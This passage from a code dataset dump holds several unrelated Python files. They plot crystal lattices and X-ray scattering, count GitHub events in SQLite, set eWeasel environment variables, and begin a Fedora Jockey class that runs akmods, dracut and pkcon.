basis=d[3], colors=d[4], sizes=d[5],\n lim_type=d[6], grid_type=None, max_=d[8], lattice_name=None,\n unit_type=None, indices=None, arrows=True, grid=True,\n verbose=False, returns=False, fig=None, ax=None, plots=True,\n rounder=True, checks=True):\n \"\"\"\n Creates, limits and plots the lattice\n \"\"\"\n\n # Minimum coefficients for lattice vectors\n min_ = [0, 0, 0]\n # Settings for grid lines\n g_col = 'k'\n g_w = 0.5\n # Number of points per plane\n num_plane_points = 20\n\n # Input sanitization\n if lattice_name is not None:\n lattice, basis, lattice_type = lattices.chooser(lattice_name,\n verbose=verbose)\n a1, a2, a3 = lattice\n # Classify the lattice\n else:\n a1, a2, a3 = np.array([a1, a2, a3])\n basis = np.array(basis)\n lattice_type = lattices.classifier(a1, a2, a3, basis)\n\n if checks:\n # Rotate the lattice, but only if we actually need to check it (for\n # example when we're not dealing with the gui)\n a1, a2, a3, basis = lattices.rotator(a1, a2, a3, basis,\n lattice_type, verbose=verbose)\n lattice = np.array([a1, a2, a3])\n\n # We need the number of basis-vectors.\n # If there is only 1 basis vector, then len(np.shape(basis)) == 1\n # otherwise the length is 2, and the first element is number of basis\n # vectors\n length_basis = np.shape(basis)\n if len(length_basis) == 1:\n n_basis = 1\n elif len(length_basis) > 1:\n n_basis = length_basis[0]\n\n # Make a list, n_basis long, for the colors and sizes,\n # if they're not specified.\n c_name = colors.__class__.__name__\n if c_name == \"str\":\n c = colors\n colors = []\n for i in range(n_basis):\n colors.append(c)\n elif c_name == \"list\" and len(colors) < n_basis:\n c = colors[0]\n colors = []\n for i in range(n_basis):\n colors.append(c)\n\n s_name = sizes.__class__.__name__\n if s_name == \"int\" or s_name == \"float\":\n s = sizes\n sizes = []\n for i in range(n_basis):\n sizes.append(s)\n elif s_name == \"list\" and len(sizes) < n_basis:\n s = sizes[0]\n sizes = []\n for i in range(n_basis):\n sizes.append(s)\n\n # Choosing gridline and unit cell type. First the default settings.\n latticelines = lattices.latticelines\n unitcells = lattices.unitcells\n\n if grid_type is None:\n grid_type = latticelines[lattice_type]\n\n if unit_type is None:\n unit_type = unitcells[lattice_type]\n else:\n try:\n unit_type = unit_type.lower()\n except AttributeError:\n print('Please input a string for unit_type. Giving primitive')\n unit_type = \"primitive\"\n\n if unit_type not in [\"primitive\", \"conventional\"]:\n print((\"Input either 'primitive' or 'conventional' for type.\"\n \" Giving 'primitive'\"))\n unit_type = \"primitive\"\n\n # Ugly hack for fixing bcc involving juggling of limits, so we plot 2 unit\n # cells (conventional) in each direction\n if (lattice_type in ['bcc', 'tetragonal body centred',\n 'orthorhombic body centred'] and\n max_ == [2, 2, 2] and lim_type == \"proper\" and (\n unit_type == \"conventional\")):\n max_ = [0, 0, 4]\n elif ('base centred' in lattice_type and max_ == [2, 2, 2] and\n lim_type == \"proper\" and unit_type == \"conventional\"):\n max_ = [0, 4, 2]\n\n # set the range of lattice vectors to be calculated\n r_min, r_max, n_min, n_max = lattices.find_limits(lim_type, a1, a2, a3,\n min_, max_,\n unit_type=unit_type)\n if rounder:\n r_min, r_max = np.around([r_min, r_max], decimals=5)\n if verbose:\n print(\"Limits found as: (type: {})\".format(lim_type))\n print(\"r_min, r_max, n_min, n_max:\")\n print(r_min, r_max, n_min, n_max)\n\n # if we plot the conventional cell we want to give r_min and r_max to\n # limiter. If not we want to give n_min and n_max\n if unit_type == \"conventional\":\n lim_min, lim_max = r_min, r_max\n else:\n lim_min, lim_max = n_min, n_max\n\n objects = lattices.generator(a1, a2, a3, basis, colors, sizes,\n n_min, n_max)\n if rounder:\n atomic_positions = np.around(objects[0], decimals=5)\n objects = [atomic_positions] + [i for i in objects[1:]]\n if verbose:\n print(\"Number of atoms and lattice points before limiting:\")\n print(objects[0].size / 3, np.sum(objects[-1]))\n # Objects to limit to the plot-box\n (atomic_positions, lattice_coefficients, atomic_colors, atomic_sizes,\n lattice_position) = lattices.limiter(points=objects[0],\n objects=objects,\n min_=lim_min,\n max_=lim_max,\n unit_type=unit_type,\n lattice=lattice,\n verbose=verbose)\n if verbose:\n print(\"Number of atoms and lattice points AFTER limiting:\")\n print(objects[0].size / 3, np.sum(objects[-1]))\n\n if indices is not None:\n if len(indices) != 3:\n print(\"We need 3 indices! We'll give you (1,1,1)\")\n indices = (1, 1, 1)\n d, planes = lattices.reciprocal(a1, a2, a3, indices, r_min, r_max,\n points=num_plane_points)\n planes = lattices.plane_limiter(planes, r_min, r_max)\n\n if verbose:\n print(\"Lattice: {}\".format(lattice_type))\n\n # Create the figure\n if fig is None:\n fig = plt.figure()\n if ax is None:\n ax = fig.gca(projection=\"3d\")\n\n # Plot atoms\n ax.scatter(atomic_positions[:, 0], atomic_positions[:, 1],\n atomic_positions[:, 2], c=atomic_colors, s=atomic_sizes)\n\n # Get the relevant gridlines:\n pruned_lines = lattices.grid_lines(a1, a2, a3, atomic_positions,\n lattice_position, grid_type,\n verbose=verbose)\n if grid:\n for line in pruned_lines:\n ax.plot(line[0], line[1], line[2], color=g_col, linewidth=g_w)\n\n if indices is not None:\n # If we plot the family of lattice planes, we plot the displacement\n # vector and the planes\n ax.quiver(0, 0, 0, d[0], d[1], d[2])\n ax.text(d[0] / 2, d[1] / 2, d[2] / 2, '$d$')\n for p in planes:\n ax.plot_surface(p[0], p[1], p[2], color='xkcd:cement', shade=False,\n alpha=0.4)\n elif arrows:\n # otherwise we plot the lattice vectors\n ax.quiver(0, 0, 0, a1[0], a1[1], a1[2])\n ax.quiver(0, 0, 0, a2[0], a2[1], a2[2])\n ax.quiver(0, 0, 0, a3[0], a3[1], a3[2])\n ax.text(a1[0] / 2, a1[1] / 2, a1[2] / 2, '$a_1$')\n ax.text(a2[0] / 2, a2[1] / 2, a2[2] / 2, '$a_2$')\n ax.text(a3[0] / 2, a3[1] / 2, a3[2] / 2, '$a_3$')\n\n # Set limits, orthographic projection (so we get the beautiful hexagons),\n # no automatic gridlines, and no axes\n ax.set_aspect('equal')\n ax.set_proj_type('ortho')\n\n plot_max = np.amax(r_max)\n plot_min = np.amin(r_min)\n ax.set_xlim([plot_min, plot_max])\n ax.set_ylim([plot_min, plot_max])\n ax.set_zlim([plot_min, plot_max])\n ax.grid(False)\n if not verbose:\n ax.axis('off')\n\n # make the panes transparent (the plot box)\n ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n\n if plots:\n plt.show()\n\n if returns:\n return fig, ax\n\n\nReciprocal = partial(Lattice, indices=(1, 1, 1))\n\n\ndef Scattering(lattice_name='simple cubic',\n basis=None,\n k_in=np.array([0, 0, -1.5]),\n form_factor=None,\n highlight=None,\n show_all=True,\n normalize=True,\n verbose=False,\n returns=False,\n return_indices=False,\n colors=None,\n laue_scale=1,\n fig=None,\n axes=None,\n plots=True):\n\n min_, max_ = (-2, -2, -1), (2, 2, 1)\n g_col = 'k'\n g_w = 0.5\n g_a = 0.6\n size_default = 36\n point_sizes = 2\n point_sizes *= size_default\n plane_z = 3.5\n beam_end_z = max_[2]\n unit_cell_type = \"conventional\"\n lim_type = \"proper\"\n outgoing_length = 10\n\n # input sanitization for the lattice/basis\n lattice_name = lattice_name.lower()\n if basis is not None:\n a1, a2, a3 = np.eye(3, dtype=int)\n basis = np.array(basis)\n else:\n lattice_name = lattice_name.lower()\n if lattice_name == \"bcc\":\n lattice_name = \"conventional bcc\"\n elif lattice_name == \"fcc\":\n lattice_name = \"conventional fcc\"\n elif lattice_name == \"simple cubic\":\n pass\n else:\n print(\"Allowed inputs: 'simple cubic', 'bcc', 'fcc'.\")\n return\n lattice, basis, _ = lattices.chooser(lattice_name, verbose=verbose)\n a1, a2, a3 = lattice\n\n grid_type = lattices.latticelines[lattice_name]\n\n # Getting the number of atoms in the basis\n length_basis = np.shape(basis)\n if len(length_basis) == 1:\n n_basis = 1\n elif len(length_basis) > 1:\n n_basis = length_basis[0]\n\n if form_factor is None:\n form_factor = [1] * n_basis\n\n if colors is None:\n form_fact_array = np.array(form_factor)\n if (form_fact_array == form_factor[0]).all():\n atom_colors = [\"xkcd:cement\"] * n_basis\n else:\n atom_colors = [\"xkcd:cement\"] + ([\"xkcd:cornflower blue\"] *\n (n_basis - 1))\n else:\n atom_colors = colors\n\n atom_sizes = [1] * n_basis\n\n # Normalizing wave vector (multiplying by k0 = 2Pi/a)\n k_in = np.array(k_in)\n\n if k_in[2] > 0:\n k_in[2] = -k_in[2]\n print((\"the z-coordinate of k_in should be negative. \"\n \"Flipping it: k_in = {}\".format(k_in)))\n\n k_title = np.copy(k_in)\n if normalize:\n k_in = k_in * 2 * np.pi\n\n # Calculating stuff for plotting the crystal\n r_min, r_max, n_min, n_max = lattices.find_limits(lim_type, a1, a2, a3,\n min_, max_,\n unit_cell_type)\n objects = lattices.generator(a1, a2, a3, basis, atom_colors,\n atom_sizes, n_min, n_max)\n objects = lattices.limiter(objects[0], objects, r_min, r_max,\n unit_cell_type)\n (atomic_positions, lattice_coefficients, atomic_colors, atomic_sizes,\n lattice_position) = objects\n\n pruned_lines = lattices.grid_lines(a1, a2, a3, atomic_positions,\n lattice_position, grid_type,\n verbose=verbose)\n\n # Create the neutron beam display vector\n k_disp = k_in / lattices.mag(k_in)\n lambda_ = 2 * np.pi / lattices.mag(k_in)\n\n # Scattering stuff\n intensities, k_out, indices = scattering.calc_scattering(a1, a2, a3, basis,\n form_factor,\n k_in)\n points = scattering.projection(k_out, p0=np.array([0, 0, plane_z]))\n\n # Plotting the basics\n detector_screen_position = [0.7, 0.2, 0.25, 0.625]\n if fig is None:\n fig = plt.figure(figsize=(10, 4))\n if axes is None:\n ax = fig.gca(projection=\"3d\")\n ax.set_position([0, 0, 0.7, 1])\n\n # Create second set of axes for detection screen\n ax2 = plt.axes(detector_screen_position)\n else:\n ax, ax2 = axes\n ax2.tick_params(axis=\"both\", labelbottom=False, labelleft=False)\n ax2.set_aspect('equal', 'box')\n\n # Plot atoms\n ax.scatter(atomic_positions[:, 0], atomic_positions[:, 1],\n atomic_positions[:, 2], c=atomic_colors, s=atomic_sizes)\n\n for line in pruned_lines:\n ax.plot(line[0], line[1], line[2],\n color=g_col, linewidth=g_w, alpha=g_a)\n\n # Plotting the beam: First we create the beam display vector\n ax.quiver(0, 0, beam_end_z, k_disp[0], k_disp[1], k_disp[2],\n color='b', lw=2, pivot='tip', length=lambda_ * laue_scale)\n\n if intensities.size == 0:\n print(\"There is no scattering for this choice of k_in\")\n\n else:\n # I assume the points are unique, now that I have deleted the ones\n # pointing into the crystal\n\n # Normalize intensities\n intensities /= np.amax(intensities)\n # Create the color array\n colors = np.zeros((intensities.size, 4))\n colors[:, 3] = intensities\n\n if highlight is not None:\n # Checking for proper highlighting\n hi_index = np.array(highlight)\n num_ints = hi_index.shape\n extra = 0\n if num_ints != (3,):\n print(\"We need 3 and only 3 indices! Highlighting nothing\")\n else:\n indices_index = np.where((indices == hi_index).all(axis=1))[0]\n if indices_index.shape != (1,):\n print(\"There is no scattering along {}\".format(highlight))\n else:\n # We have highlighting!\n d, planes = lattices.reciprocal(a1, a2, a3, hi_index,\n r_min - extra,\n r_max + extra,\n points=20)\n planes = lattices.plane_limiter(planes, r_min - extra,\n r_max + extra)\n # We change the color of highlighted point and plot the\n # family of planes\n high_intensity = intensities[indices_index]\n colors[indices_index] = [1, 0, 0, high_intensity]\n for p in planes:\n ax.plot_surface(p[0], p[1], p[2], color=\"r\",\n shade=False, alpha=0.2)\n # We also plot the outgoing line corresponding to this\n # scattering. First we get the point (and squeeze it, to\n # make it 1D again)\n p = np.squeeze(points[indices_index, :])\n start = np.array([0, 0, beam_end_z])\n ray = p - start\n line = np.array([start, start + outgoing_length * ray])\n ax.plot(line[:, 0], line[:, 1], line[:, 2], color='r',\n alpha=0.3, ls='--',\n lw=g_w * 2)\n # Plotting outgoing vector and Laue condition\n k_out_high = np.squeeze(k_out[indices_index])\n G_high = k_in - k_out_high\n vecs = np.array([k_out_high, k_out_high, G_high])\n vecs_disp = vecs / lattices.mag(k_in)\n starts = np.array([start,\n start - k_disp * lambda_ * laue_scale,\n (start - vecs_disp[2] * lambda_ *\n laue_scale)])\n ax.quiver(starts[:, 0],\n starts[:, 1],\n starts[:, 2],\n vecs_disp[:, 0],\n vecs_disp[:, 1],\n vecs_disp[:, 2],\n color=['r', 'r', 'g'],\n alpha=0.5,\n lw=1,\n length=lambda_ * laue_scale)\n\n ranges = (np.amax(points, axis=0) - np.amin(points, axis=0))[:-1]\n ax2.scatter(points[:, 0], points[:, 1], c=colors)\n for i in range(len(indices)):\n x, y = points[i, 0:2] - 0.05 * ranges\n s = indices[i]\n c = colors[i, :-1]\n ax2.text(x, y, s, color=c, va='top', ha='right')\n\n # Plotting detection plane\n abs_ex = 0.0\n rel_ex = 0.1\n def_y = 2\n def_x = 2\n x_min = np.amin(points[:, 0]) * (1 + rel_ex) - abs_ex\n x_max = np.amax(points[:, 0]) * (1 + rel_ex) + abs_ex\n y_min = np.amin(points[:, 1]) * (1 + rel_ex) - abs_ex\n y_max = np.amax(points[:, 1]) * (1 + rel_ex) + abs_ex\n x_range = np.array([min(x_min, -def_x), max(x_max, def_x)])\n y_range = np.array([min(y_min, -def_y), max(y_max, def_y)])\n x, y = np.meshgrid(x_range, y_range)\n z = plane_z * np.ones(x.shape)\n ax.plot_surface(x, y, z, color='k', alpha=0.2)\n\n # plotting intersections\n ax.scatter(points[:, 0], points[:, 1], plane_z, color=colors)\n\n # Setting limits for the second figure\n det_max_x = np.amax(x_range)\n det_min_x = np.amin(x_range)\n det_max_y = np.amax(y_range)\n det_min_y = np.amin(y_range)\n det_max = max(det_max_x, det_max_y)\n det_min = min(det_min_x, det_min_y)\n ax2.set_xlim(det_min, det_max)\n ax2.set_ylim(det_min, det_max)\n\n if show_all:\n # Plotting outgoing vectors\n n = k_out.shape[0]\n k_plot = k_out / lattices.mag(k_in)\n start_point = np.array((0, 0, beam_end_z))\n start_points = np.repeat(np.atleast_2d(start_point), n, axis=0)\n ax.quiver(start_points[:, 0],\n start_points[:, 1],\n start_points[:, 2],\n k_plot[:, 0],\n k_plot[:, 1],\n k_plot[:, 2],\n color='g',\n alpha=0.5,\n lw=g_w,\n length=lambda_)\n\n # plotting outgoing lines\n for p in points:\n ray = p - start_point\n line = np.array([start_point,\n start_point + outgoing_length * ray])\n ax.plot(line[:, 0], line[:, 1], line[:, 2],\n color='k', alpha=0.3, ls='--',\n lw=g_w)\n\n ax.set_aspect('equal')\n ax.set_proj_type('ortho')\n ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n\n # Some limit trickery. We make the plot box cubic:\n plot_max = np.amax(r_max)\n plot_min = np.amin(r_min)\n ax.set_xlim(plot_min, plot_max)\n ax.set_ylim(plot_min, plot_max)\n ax.set_zlim(plot_min, plot_max)\n\n ax.grid(False)\n ax.axis('off')\n\n tit = (r'Scattering on a cubic lattice. $k_{in} = (2\\pi/a)\\cdot$' +\n '{}'.format(k_title))\n tit2 = (r'Scattering on a cubic lattice. $k_{in} = $' +\n '{}'.format(k_title))\n if normalize:\n ax.set_title(tit)\n else:\n ax.set_title(tit2)\n ax2.set_title('Detection screen.\\nForm factors: {}'.format(form_factor))\n if plots:\n plt.show()\n return_list = []\n if returns:\n return_list += [fig, ax, ax2]\n if return_indices:\n return_list.append(indices)\n if returns or return_indices:\n return return_list\n\n\ndef Band_structure(V0=0, n_k=51, G_range=list(range(-3, 4)),\n potential=\"harmonic\", edges=False,\n E_F=None,\n returns=False,\n plots=True):\n\n # First some input sanitization\n potentials = {\"harmonic\": band_structure.VG_cos,\n \"dirac\": band_structure.VG_dirac}\n class_name = potential.__class__.__name__\n if class_name not in [\"function\", \"str\"]:\n print((\"Please input either 'dirac', 'harmonic' or the name of your \"\n \"own potential function. Giving harmonic.\"))\n potential = band_structure.VG_cos\n elif class_name == \"str\":\n if potential.lower() not in [\"dirac\", \"harmonic\"]:\n print((\"Please input either 'dirac' or 'harmonic' as the \"\n \"potential. Giving harmonic.\"))\n potential = band_structure.VG_cos\n potential = potentials[potential.lower()]\n\n # We calculate the band structure\n o = band_structure.calc_band_structure(V0=V0, n_k=n_k, G_range=G_range,\n potential=potential)\n kxs, kys, band, max_E = o\n if E_F is None:\n E_F = max_E\n E_F_mat = max_E * np.ones((n_k, n_k))\n max_k = np.amax(kxs)\n min_k = np.amin(kxs)\n\n # Create the figure\n fig = plt.figure(figsize=(10, 4))\n ax = fig.gca(projection=\"3d\")\n ax.set_position([0.05, 0, 0.5, 1])\n\n # Optional plotting of Fermi surface in main axes.\n ax.contour(kxs, kys, band, E_F, colors='r', linewidths=3)\n\n # Plotting of the main event: the band structure\n ax.plot_surface(kxs, kys, band, alpha=0.9)\n ax.plot_surface(kxs, kys, E_F_mat, alpha=0.2)\n ax.set_xlim([min_k, max_k])\n ax.set_ylim([min_k, max_k])\n ax.set_xlabel(r'$k_x/k_0$')\n ax.set_ylabel(r'$k_y/k_0$')\n ax.set_zlabel(r'$E/E_0$')\n ax.set_title(('Band structure of square lattice. ' +\n '$V_0/E_0 = {}$. $E_F = {}$'.format(V0, np.round(E_F, 3))))\n\n # optional plotting of the edges\n if edges:\n # First we get the edges and wave vectors\n edge1 = band[0, :]\n edge2 = band[-1, :]\n edge3 = band[:, 0]\n edge4 = band[:, -1]\n k = kxs[0, :]\n start = -1 / 2 * np.ones(k.shape)\n end = 1 / 2 * np.ones(k.shape)\n\n # And plot them.\n ax.plot(k, start, edge1, c='k')\n ax.plot(k, end, edge2, c='k')\n ax.plot(start, k, edge3, c='k')\n ax.plot(end, k, edge4, c='k')\n\n # Plotting of the second set of axes\n ax2 = plt.axes([0.7, 0.2, 0.25, 0.6])\n ax2.contour(kxs, kys, band, E_F)\n ax2.set_xlabel(r'$k_x/k_0$')\n ax2.set_ylabel(r'$k_y/k_0$')\n ax2.set_title('Fermi surface')\n\n if plots:\n plt.show()\n\n if returns:\n return fig, ax, ax2\n\n\nif __name__ == \"__main__\":\n gui.main()\n","sub_path":"cmp.py","file_name":"cmp.py","file_ext":"py","file_size_in_byte":22870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"465342906","text":"\"\"\"\nRecent Past Behaviors analysis. Version 4 of past_behavior.\nCount number of events of each type in a time period ending at current time\nand in the preceding time period of equal length for a specific user.\nCompute metric for change from the previous time period to last time period.\n\"\"\"\n\nimport json\nimport time\nimport sqlite3\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom common import event_db\nfrom common import format\nfrom uuid import uuid4\n\n\n# count_events returns dictionary of number of events of each type\n# that occur between dt1 and dt2 for user_id.\ndef count_events(dt1, dt2, user_id, con):\n\n cur = con.cursor()\n\n event_count = { \"CreateEvent\": 0,\n \"DeleteEvent\": 0,\n \"ForkEvent\": 0,\n \"IssuesEvent\": 0,\n \"PullRequestEvent\": 0,\n \"PushEvent\": 0,\n \"WatchEvent\": 0 }\n\n dtstr1 = dt1.strftime(format)\n dtstr2 = dt2.strftime(format)\n\n print(dtstr1, dtstr2)\n\n timeA = datetime.now()\n\n if user_id == \"\":\n sql = \"\"\"\n select type\n from event\n where (created_at >= ?)\n and (created_at < ?)\n \"\"\"\n cur.execute(sql, (dtstr1, dtstr2))\n else:\n sql = \"\"\"\n select type\n from event\n where \"actor.login_h\" = ?\n and (created_at >= ?)\n and (created_at < ?)\n \"\"\"\n cur.execute(sql, (user_id, dtstr1, dtstr2))\n\n while True:\n row = cur.fetchone()\n if row == None:\n break\n\n (etype,) = row\n\n\n if etype in event_count:\n event_count[etype] += 1\n\n timeB = datetime.now()\n print('\\ntime in count_events query=', str(timeB-timeA))\n\n for etype in event_count.keys():\n print(etype, event_count[etype])\n\n return event_count\n\n\ndef past_behavior_metric(current_timestr, period_length, user_id, con):\n print ('running version 4 of past_behavior')\n dt_current_time = datetime.strptime(current_timestr, format)\n delta = timedelta(days=period_length)\n\n print(\"\\nFor user \", user_id)\n print(\"\\nevent count for last period:\")\n last_period = count_events(dt_current_time-delta, dt_current_time, user_id, con)\n\n\n print(\"\\nevent count for previous period:\")\n prev_period = count_events(dt_current_time-2*delta, dt_current_time-delta, user_id, con)\n\n print(\"\\ntype\", \" metric\")\n\n result = {}\n\n for etype in last_period.keys():\n if prev_period[etype] > 0:\n result[etype] = round(float(last_period[etype]) / prev_period[etype] - 1, 2)\n else:\n result[etype] = 0\n\n print(etype, result[etype])\n\n return result\n","sub_path":"MatrixCodeLevels/CodeLevel1/past_behavior_v4.py","file_name":"past_behavior_v4.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"186617733","text":"#!/usr/local/bin/python\nfrom _class import *;\n\nclass InitEnvParameter(InitEnvParameterClass):\n\tdef __init__(self):\n\t\tInitEnvParameterClass.__init__(self)\n\t\tself.id = \"eweasel\"\n\n\tdef title(self):\n\t\treturn \"eWeasel\"\n\n\tdef arg(self):\n\t\treturn \"--eweasel\"\n\n\tdef choices(self):\n\t\tarr = []\n\t\tarr.append ([\"on\", \"Enabled\"])\n\t\tarr.append ([\"off\", \"Disabled\"])\n\t\tarr.append ([\"_default\", \"off\"])\n\t\treturn arr;\n\n\tdef output_init(self,home_bin,choice,writer):\n\t\twriter.put_comment (\"## Init:%s ##\" % (self.title()))\n\n\tdef output(self,home_bin,choice,writer):\n\t\tif choice == '_skip':\n\t\t\twriter.put_message (\"Skipping: %s settings\" % (title()))\n\t\telse:\n\t\t\tch = choice\n\t\t\tif choice == \"on\":\n\t\t\t\twriter.put_set_variable ('EWEASEL', '%EIFFEL_SRC%\\\\..\\\\eweasel')\n\t\t\t\twriter.put_set_variable ('EWEASEL_OUTPUT', '%EIFFEL_SRC%\\\\..\\\\..\\\\eweasel\\\\output')\n\t\t\t\twriter.put_set_variable ('ISE_LIBRARY', '%ISE_EIFFEL%')\n\n\t\t\t\t\t# Add eweasel to PATH\n\t\t\t\twriter.put_append_to_path ('%EWEASEL%\\\\spec\\\\%ISE_PLATFORM%\\\\bin')\n\t\t\telse:\n\t\t\t\twriter.put_unset_variable ('EWEASEL')\n\t\t\t\twriter.put_unset_variable ('EWEASEL_OUTPUT')\n\n\t\t\t\ttry:\n\t\t\t\t\teiffel_src_set = os.environ['eiffel_src_set'];\n\t\t\t\texcept:\n\t\t\t\t\teiffel_src_set = ''\n\t\t\t\tif len(eiffel_src_set) > 0:\n\t\t\t\t\twriter.put_set_variable ('EWEASEL', '%EIFFEL_SRC%\\\\..\\\\eweasel')\n\t\t\twriter.put_echo_mode(False)\n\t\t\t\n","sub_path":"initenv/settings/parameters/eweasel.py","file_name":"eweasel.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"495868545","text":"# -*- coding: UTF-8 -*-\n# (c) 2007 Canonical Ltd.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\n'''Encapsulate operations which are Linux distribution specific.'''\n\nimport fcntl, os, subprocess, sys, logging, re, tempfile, time, shutil\nfrom glob import glob\n\n# global variables\nakmods_enabled = False\n\nclass OSLib:\n '''Encapsulation of operating system/Linux distribution specific operations.'''\n\n # global default instance\n inst = None\n\n global akmods_enabled\n #logging.debug('class akmod status: %s', akmods_enabled)\n print(\"class akmod status: %s\" % akmods_enabled)\n\n def __init__(self, client_only=False, target_kernel=None):\n '''Set default paths and load the module blacklist.\n\n Distributors might want to override some default paths.\n If client_only is True, this only initializes functionality which is\n needed by clients, and which can be done without special privileges.\n\n If target_kernel is given, it is used instead of the default\n os.uname()[2]. This is primarily useful for distribution installers\n where the target system kernel differs from the installer kernel.\n '''\n\n global akmods_enabled\n logging.debug('init akmod status pre-config: %s', akmods_enabled)\n\n self.remove_pkg_queue = set()\n\n # relevant stuff for clients and backend\n self._get_os_version()\n\n # location of config file\n self.config_file = '/etc/jockey.conf'\n\n # /sys/ path; the main purpose of changing this is for test\n # suites, but some vendors might have /sys in a nonstandard place\n self.sys_dir = '/sys'\n\n if client_only:\n return\n\n # below follows stuff which is only necessary for the backend\n\n # default paths\n\n # path to a modprobe.d configuration file where kernel modules are\n # enabled and disabled with blacklisting\n self.module_blacklist_file = '/etc/modprobe.d/blacklist-local.conf'\n\n # path to modinfo binary\n self.modinfo_path = '/sbin/modinfo'\n\n # path to modprobe binary\n self.modprobe_path = '/sbin/modprobe'\n\n # path to kernel's list of loaded modules\n self.proc_modules = '/proc/modules'\n\n # default path to custom handlers\n self.handler_dir = '/usr/share/jockey/handlers'\n\n if target_kernel:\n self.target_kernel = target_kernel\n else:\n self.target_kernel = os.uname()[2]\n\n # default paths to modalias files (directory entries will consider all\n # files in them)\n\n # set akmod support to disabled by default, enabled below after reading config file\n #self.akmods_enabled = False\n\n # Enable akmods if set in config, else check PAE, fallback to kmod\n conf_file = open(self.config_file)\n\n for line in conf_file:\n if \"akmods=true\" in line.lower():\n alias_dir = '-akmods'\n akmods_enabled = True\n elif re.search('.*PAE.*', self.target_kernel):\n alias_dir = '-PAE'\n else:\n alias_dir = ''\n\n conf_file.close()\n\n logging.debug('init akmod status post-config: %s', akmods_enabled)\n\n self.modaliases = [\n '/usr/share/jockey/modaliases%s/' % alias_dir,\n ]\n\n # path to X.org configuration file\n self.xorg_conf_path = '/etc/X11/xorg.conf'\n\n self.set_backup_dir()\n\n # cache file for previously seen/newly used handlers lists (for --check)\n self.check_cache = os.path.join(self.backup_dir, 'check')\n\n self._load_module_blacklist()\n\n # Possible paths of a file with a set of SSL certificates which are\n # considered trustworthy. The first one that exists will be used.\n # This is used for downloading GPG key fingerprints for\n # openprinting.org driver packages.\n self.ssl_cert_file_paths = [\n # Debian/Ubuntu use the ca-certificates package:\n '/etc/ssl/certs/ca-certificates.crt'\n ]\n\n # default GPG key server\n # this is the generally recommended DNS round-robin, but usually very\n # slow:\n #self.gpg_key_server = 'keys.gnupg.net'\n self.gpg_key_server = 'hkp://keyserver.ubuntu.com:80'\n\n # Package which provides include files for the currently running\n # kernel. If the system ensures that kernel headers are always\n # available, or being pulled in via dependencies (and there are not\n # multiple kernel flavors), it is ok to set this to \"None\". This should\n # use self.target_kernel instead of os.uname()[2].\n self.kernel_header_package = None\n\n #\n # The following functions are Fedora specific\n #\n\n def build_kmod(self, progress_cb, phase):\n '''Build kmod package.'''\n\n phase = phase\n err = ''\n\n progress_cb(phase, -1, -1)\n\n logging.debug('\\n\\n\\nbuild_kmod\\n\\n\\n')\n time.sleep(30)\n\n kernel_version = os.uname()[2]\n akmods = subprocess.Popen(['/usr/sbin/akmods', '--kernels', kernel_version],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n err += akmods.stderr.read()\n\n if akmods.wait() != 0:\n logging.error('Failed to build kmod: %s' % (err))\n else:\n logging.debug('Successfully built kmod for kernel %s' % kernel_version)\n\n\n def rebuild_initramfs(self, progress_cb, phase):\n '''Rebuild the initramfs.'''\n\n phase = phase\n err = ''\n\n if progress_cb and phase == \"remove\":\n progress_cb(-1, -1)\n else:\n progress_cb(phase, -1, -1)\n\n logging.debug('\\n\\n\\nbuild_initramfs\\n\\n\\n')\n time.sleep(30)\n\n dracut = subprocess.Popen(['/sbin/dracut', '--force', '-v'],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n err += dracut.stderr.read()\n\n if dracut.wait() != 0:\n logging.error('Failed to rebuild initramfs: %s' % (err))\n else:\n logging.debug('Successfully rebuilt initramfs')\n\n #\n # The following package related functions use PackageKit; if that does not\n # work for your distribution, they must be reimplemented\n #\n\n def is_package_free(self, package):\n '''Return if given package is free software.'''\n\n pkcon = subprocess.Popen(['pkcon', '--filter=newest',\n 'get-details', package], stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # we send an \"1\" to select package if several versions\n # are available (--filter is broken in at least Fedora 10)\n out = pkcon.communicate('1\\n')[0]\n m = re.search(\"^\\s*license:\\s*'?(.*)'?$\", out, re.M)\n if m:\n # TODO: check more licenses here\n return m.group(1).lower().startswith('gpl') or \\\n m.group(1).lower() in ('free', 'bsd', 'mpl')\n else:\n raise ValueError('package %s does not exist' % package)\n\n def package_installed(self, package):\n '''Return if the given package is installed.'''\n\n pkcon = subprocess.Popen(['pkcon', 'resolve', package],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = pkcon.communicate()[0]\n return pkcon.returncode == 0 and '\\ninstalled ' in out.lower()\n\n def package_description(self, package):\n '''Return a tuple (short_description, long_description) for a package.\n\n This should raise a ValueError if the package is not available.\n '''\n pkcon = subprocess.Popen(['pkcon', '--filter=newest',\n 'get-details', package], stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # we send an \"1\" to select package if several versions\n # are available (--filter is broken in at least Fedora 10)\n out = pkcon.communicate('1\\n')[0]\n m = re.search(\"^\\s*description:\\s*'?(.*?)'?^\\s+\", 